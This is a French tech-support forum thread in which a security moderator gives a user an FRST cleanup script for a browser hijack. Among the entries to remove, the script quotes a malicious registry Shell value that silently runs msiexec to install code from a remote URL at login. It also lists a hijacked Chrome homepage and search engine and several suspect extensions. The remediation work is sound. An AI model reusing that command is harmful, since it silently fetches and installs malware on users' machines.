Malicious domains request
Fermé
tvllde
Messages postés
6
Date d'inscription
mardi 7 septembre 2021
Statut
Membre
Dernière intervention
12 septembre 2021
-
Modifié le 7 sept. 2021 à 09:43
bazfile Messages postés 56664 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 19 décembre 2024 - 7 sept. 2021 à 20:08
bazfile Messages postés 56664 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 19 décembre 2024 - 7 sept. 2021 à 20:08
A voir également:
- Malicious domain request 22 c'est quoi
- Malicious domain request 22 - Forum Virus
- 01 62 12 22 84 ✓ - Forum Mobile
- Bad request error 403 paiement - Forum Réseaux sociaux
- 400 bad request request header or cookie too large - Forum Webmastering
- Indicatif +22 ✓ - Forum Mobile
2 réponses
bazfile
Messages postés
56664
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
19 décembre 2024
19 334
Modifié le 7 sept. 2021 à 10:32
Modifié le 7 sept. 2021 à 10:32
Bonjour,
Procédure à faire dans l'ordre indiqué :
1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.
5- Réinitialise Google Chrome avec ce logiciel
Procédure à faire dans l'ordre indiqué :
1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
Start::
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-4027503653-722601690-3486861723-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj1YRTMyOTVLN8IcFkVQNWY4NkNYMWMyRTwdNTlQRkU3Fc== /q
GroupPolicy: Restriction - Chrome
Policies: C:\ProgramData\NTUSER.pol: Restriction
Task: {4822200C-3399-4B4F-8ECD-88D08961D913} - \Microsoft\Windows\UNP\RunCampaignManager -> Pas de fichier
HKU\S-1-5-21-4027503653-722601690-3486861723-1001\...\Run: [GoogleChromeAutoLaunch_7191D2EE431CF1BFBD07262D6610CBA5] => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
HKU\S-1-5-21-4027503653-722601690-3486861723-1001\...\Run: [MicrosoftEdgeAutoLaunch_18DCCC84771B89068C3B3D9FB28E3E28] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Task: {20F29426-17B0-4437-AE9A-553B269EC0B1} - System32\Tasks\{70F8B8CF-C72D-4487-BCD6-A67A3DF55CC4} => "c:\program files (x86)\dohat\application\chrome.exe" https://ui.skype.com/ui/0/7.41.0.101/fr/abandoninstall?page=tsMain
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif]
CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce]
CHR HKU\S-1-5-21-4027503653-722601690-3486861723-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd]
CHR HKU\S-1-5-21-4027503653-722601690-3486861723-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif]
CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce]
CHR HomePage: Default -> hxxp://www.home-explore.com/
CHR NewTab: Default -> Not-active:"chrome-extension://gfoabcdjalmeenbjjngidappmppchblc/homePageRedirect.html", Active:"chrome-extension://gpdpldlbafdmhlmcdllcjgoigmpjonfc/newtab.html"
CHR DefaultSearchURL: Default -> hxxp://www.home-explore.com/search?q={searchTerms}
CHR DefaultSearchKeyword: Default -> recherche
C:\program files (x86)\dohat
EmptyTemp:
End::
3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.
5- Réinitialise Google Chrome avec ce logiciel